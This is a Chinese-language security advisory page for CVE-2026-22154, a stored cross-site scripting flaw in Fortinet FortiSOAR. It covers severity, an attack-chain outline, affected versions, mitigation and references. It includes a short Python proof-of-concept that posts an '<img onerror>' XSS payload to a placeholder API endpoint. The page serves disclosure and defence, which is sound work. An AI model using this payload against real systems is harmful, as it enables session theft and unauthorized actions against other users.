CVE-2026-22154 CVSS 4.6 中危

CVE-2026-22154 Fortinet FortiSOAR 存储型XSS漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22154

漏洞类型

存储型跨站脚本攻击

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Fortinet FortiSOAR

漏洞概述

Fortinet FortiSOAR在多个版本中存在输入验证不足的漏洞，涉及PaaS和本地部署版本。该漏洞源于网页生成时未正确中和用户输入，允许经过身份认证的远程攻击者通过发送特制的HTTP请求，注入恶意脚本。当其他用户浏览受影响页面时，脚本将在其浏览器中执行，从而导致存储型跨站脚本（XSS）攻击。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS），其根本原因在于Fortinet FortiSOAR在处理用户输入时缺乏严格的过滤机制。攻击者首先需要获取系统的低权限账户，随后利用特定的API接口或Web表单，通过精心构造的HTTP请求提交包含恶意JavaScript代码的数据。由于应用程序未对输入数据进行有效的转义，这些恶意脚本被直接存储在后端数据库中。当具备高权限的管理员或其他用户访问该受影响的数据条目时，服务器会将未经过滤的恶意脚本返回给客户端浏览器，导致脚本在受害者的上下文中执行。利用此漏洞，攻击者可以窃取敏感的会话令牌、修改页面内容，甚至利用受害者的权限执行未授权的操作，从而对系统的机密性和完整性构成威胁。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的Fortinet FortiSOAR版本，确认其是否存在漏洞。

STEP 2

获取凭证

攻击者利用低权限账户或通过其他手段获取一个有效的认证凭证。

STEP 3

漏洞利用

攻击者发送特制的HTTP请求，将包含JavaScript代码的恶意数据提交到系统漏洞接口。

STEP 4

载荷存储

系统未能过滤恶意代码，将其持久化存储在数据库中。

STEP 5

触发执行

管理员或其他用户访问包含该数据的页面，恶意脚本在浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Proof of Concept for CVE-2026-22154
# This script demonstrates how an authenticated attacker might trigger the Stored XSS.

TARGET_URL = "https://<target-ip>/api/endpoint"
SESSION_COOKIE = "<valid_session_cookie>"

# Malicious payload to be stored
XSS_PAYLOAD = "<img src=x onerror=alert('XSS')>"

headers = {
    "Cookie": f"session={SESSION_COOKIE}",
    "Content-Type": "application/json"
}

data = {
    "field_name": "Incident Title",
    "description": XSS_PAYLOAD  # Injecting payload into a vulnerable field
}

try:
    response = requests.post(TARGET_URL, json=data, headers=headers, verify=False)
    if response.status_code == 200:
        print("[+] Payload injected successfully.")
        print("[+] Check the corresponding page to verify XSS execution.")
    else:
        print(f"[-] Injection failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

FortiSOAR PaaS 7.3.0 - 7.3.x

FortiSOAR PaaS 7.4.0 - 7.4.x

FortiSOAR PaaS 7.5.0 - 7.5.2

FortiSOAR PaaS 7.6.0 - 7.6.3

FortiSOAR on-premise 7.3.0 - 7.3.x

FortiSOAR on-premise 7.4.0 - 7.4.x

FortiSOAR on-premise 7.5.0 - 7.5.2

FortiSOAR on-premise 7.6.0 - 7.6.3

防御指南

临时缓解措施

建议尽快升级至官方发布的修复版本。若无法立即升级，应严格限制低权限用户的输入权限，并对系统输出的数据进行HTML实体编码处理。同时，建议管理员定期审查系统日志，警惕异常的数据提交行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-22154
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-22154
3 Details https://www.cvedetails.com/cve/CVE-2026-22154/
4 VulDB https://vuldb.com/cve/CVE-2026-22154
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-26-117

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表